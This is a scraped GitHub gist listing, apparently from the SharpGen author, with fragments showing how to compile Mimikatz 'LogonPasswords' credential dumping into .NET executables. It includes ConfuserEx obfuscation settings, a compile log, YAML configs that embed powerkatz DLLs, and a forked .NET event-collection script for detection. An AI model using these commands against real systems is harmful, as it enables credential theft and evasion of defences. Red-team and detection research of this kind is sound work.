cobbr
/ sharpgen-example-7
Created
November 6, 2018 16:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cobbr@mac:~/SharpGen > dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --no-optimization "Console.WriteLine(Mimikatz.LogonPasswords());" | |
| ... | |
| [*] Compiled assembly written to: /Users/cobbr/SharpGen/Output/example.exe |
cobbr
/ CollectDotNetEvents.ps1
Last active
January 24, 2019 01:35
— forked from mattifestation/CollectDotNetEvents.ps1
A PoC script to capture relevant .NET runtime artifacts for the purposes of potential detections
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Start-DotNetEventCollection | |
| { | |
| Param( | |
| [Parameter(Position = 0)] | |
| [Alias('PSPath')] | |
| [String] $TracePath = './dotNetTrace.etl', | |
| [Parameter(Position = 1)] | |
| [String] $TraceName = 'dotNetTrace' | |
| ) |
cobbr
/ sharpgen-confuserex-1
Created
November 6, 2018 16:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <project baseDir="{0}" outputDir="{1}" xmlns="http://confuser.codeplex.com"> | |
| <module path="{2}"> | |
| <rule pattern="true" inherit="false"> | |
| <!-- <protection id="anti debug" /> --> | |
| <!-- <protection id="anti dump" /> --> | |
| <!-- <protection id="anti ildasm" /> --> | |
| <!-- <protection id="anti tamper" /> --> | |
| <!-- <protection id="constants" /> --> | |
| <!-- <protection id="ctrl flow" /> --> | |
| <!-- <protection id="invalid metadata" /> --> |
cobbr
/ sharpgen-example-6
Created
November 6, 2018 16:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cobbr@mac:~/SharpGen > dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --confuse confuse.cr "Console.WriteLine(Mimikatz.LogonPasswords());" | |
| ... | |
| [+] Confusing assembly... | |
| [INFO] Confuser.Core 1.1.0-alpha1.52+gfe12a44191 Copyright © 2014 Ki, 2018 Martin Karing | |
| [INFO] Running on Unix 17.5.0.0, .NET Framework v4.0.30319.42000, 64 bits | |
| [DEBUG] Discovering plugins... | |
| [INFO] Discovered 10 protections, 1 packers. | |
| [DEBUG] Resolving component dependency... | |
| [INFO] Loading input modules... | |
| [INFO] Loading 'example.exe'... |
cobbr
/ sharpgen-resources-3
Created
November 6, 2018 15:59
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| - Name: SharpSploit.Resources.powerkatz_x86.dll | |
| File: powerkatz_x86.dll | |
| Platform: x86 | |
| Enabled: false | |
| - Name: SharpSploit.Resources.powerkatz_x64.dll | |
| File: powerkatz_x64.dll | |
| Platform: x64 | |
| Enabled: false | |
| - Name: SharpSploit.Resources.powerkatz_x86.dll.comp | |
| File: powerkatz_x86.dll.comp |
cobbr
/ sharpgen-resources-2
Created
November 6, 2018 15:59
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| - Name: SharpSploit.Resources.powerkatz_x86.dll | |
| File: powerkatz_x86.dll | |
| Platform: x86 | |
| Enabled: false | |
| - Name: SharpSploit.Resources.powerkatz_x64.dll | |
| File: powerkatz_x64.dll | |
| Platform: x64 | |
| Enabled: true |
cobbr
/ sharpgen-example-5
Created
November 6, 2018 15:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cobbr@mac:~/SharpGen > dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --platform x64 "Console.WriteLine(Mimikatz.LogonPasswords());" |
cobbr
/ sharpgen-resources-1
Created
November 6, 2018 15:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| - Name: SharpSploit.Resources.powerkatz_x86.dll | |
| File: powerkatz_x86.dll | |
| Platform: x86 | |
| Enabled: false | |
| - Name: SharpSploit.Resources.powerkatz_x64.dll | |
| File: powerkatz_x64.dll | |
| Platform: x64 | |
| Enabled: false |
cobbr
/ sharpgen-references-1
Created
November 6, 2018 15:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| - File: System.Management.Automation.dll | |
| Framework: Net35 | |
| Enabled: false |
cobbr
/ sharpgen-structure
Created
November 6, 2018 15:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --> SharpGen | |
| |---> Source // Generated binaries will be compiled against all source code under this directory | |
| |---> SharpSploit // SharpSploit source code | |
| |---> References // Generated binaries will references DLLs listed under this directory during compilation | |
| |---> references.yml // References configuration file that directs SharpGen on which DLLs to reference during compilation | |
| |---> net35 // Directory for .NET Framework 3.5 references DLLs | |
| |---> net40 // Directory for .NET Framework 4.0 references DLLs | |
| |---> Resources // Generated binaries will embed resources under this directory during compilation | |
| |---> resources.yml // Resources configuration file that directs SharpGen on which resources to embed in generated binaries | |
| |---> powerkatz_x64.dll // Mimikatz 64-bit dll |